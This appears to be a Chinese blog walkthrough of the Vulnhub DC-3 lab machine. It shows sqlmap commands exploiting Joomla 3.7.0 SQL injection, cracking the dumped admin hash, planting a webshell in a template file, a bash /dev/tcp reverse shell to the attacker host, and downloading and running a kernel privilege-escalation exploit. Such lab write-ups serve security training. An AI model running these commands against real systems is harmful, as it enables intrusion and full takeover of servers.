DC-3靶机解题思路

说明：Vulnhub是一个渗透测试实战网站，提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习，实践。此次记录的是DC-3靶机，全程只有一个falg获取root权限，以下内容是自身复现的过程，总结记录下来，如有不足请多多指教。

下载地址：

Download (Mirror): http://www.five86.com/downloads/DC-3.zip

目标机IP地址：192.168.5.139
攻击机kali IP地址：192.168.5.135

前期准备：

信息收集时发现目标机与攻击机不在同一网段上,下面就对目标机进行网络配置。

开启靶机摁‘e’速度要快，找到root ro 将ro替换为 rw signie init=/bin/bash 

Ctrl+x 进入命令行。

查看网卡信息， ip a 网卡名为ens33。

编辑网卡配置文件，/vim/etc/network/interfaces  发现网卡名不配，替换网卡名ens33。

配置完成后，重启网卡 /etc/init.d/networking stop   /etc/init.d/networking start 

已经成功获取ip。

信息收集

配置好ip下面进行信息收集。

arp-scan -l 发现目标ip。

对目标机扫描端口。

nmap -sV -p- 192.168.5.139  -A 只开启了web服务，该站点是使用joomla创建。

访问后台页面。

对后台路径进行爆破。

python .dirsearch.py -u http://192.168.5.139/ -e*

访问爆破出来的路径。

http://192.168.5.139/README.txt

http://192.168.5.139/htaccess.txt

http://192.168.5.139/administrator/index.php

发现了对joomla的介绍，登陆后台登陆页面，

收集joomla3.7.0是否存在漏洞，该版本存在SQL注入漏洞（具体漏洞复现以及成因会在靶机系列结束后进行研讨分析。）,也可使用searchsploit来查找版本所出现的漏洞。(“searchsploit”是一个用于Exploit-DB的命令行搜索工具，它还允许你随身带一份Exploit-DB的副本。) 

searchsploit Jooma 3.7.0

find ./ -name 42033.txt 搜索提示文件。查看文档内容

攻击操作

根据提示，使用Sqlmap

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将数据库爆了出来。

下一步查看joomladb数据库中的所有表。

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

下一步查看#__users表中的字段。

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns

查看name字段与password字段，获取用户与密码。

admin/$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C  "name,password" --dump

将密码存入文件中，使用john 进行解密。

john可使用字典破解用户密码的hash值。破解密码为snooy。

登陆成功。

点击模板管理，查看详情，修改文件modules.php，写入木马。

写入后访问http://192.168.5.139/templates/beez3/html/

使用蚁剑链接木马。

http://192.168.5.139/templates/beez3/html/modules.php

反弹shell: bash -c 'bash -i >& /dev/tcp/192.168.5.135/7777 0>&1' 

反弹成功。

溜达了一圈未发现可利用的东西。查看一下服务器操作版本。看看可否进行提权。

lsb_release -a

Ubuntu 16.04

searchsploit Ubuntu 16.04

发现一项内核漏洞可以提权。

find ./ -name   39772.txt 搜索详情文件所在路径。文件提示了该漏洞的利用方式，提供了利用工具的下载地址，下载使用wget 进行下载，下载后解压。

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

进行解压

unzip 39772.zip 

tar -xvf exploit.tar 

cd ebpf_mapfd_doubleput_exploit

执行./compile.sh （编译会出现waring 可以忽视）。

执行./doubleput，进行提权，稍等片刻提权成功。

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！

个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书：https://www.jianshu.com/u/bf0e38a8d400

个人CSDN：https://blog.csdn.net/qq_37602797/category_10169006.html

本文始发于微信公众号（thelostworld）：DC-3靶机解题思路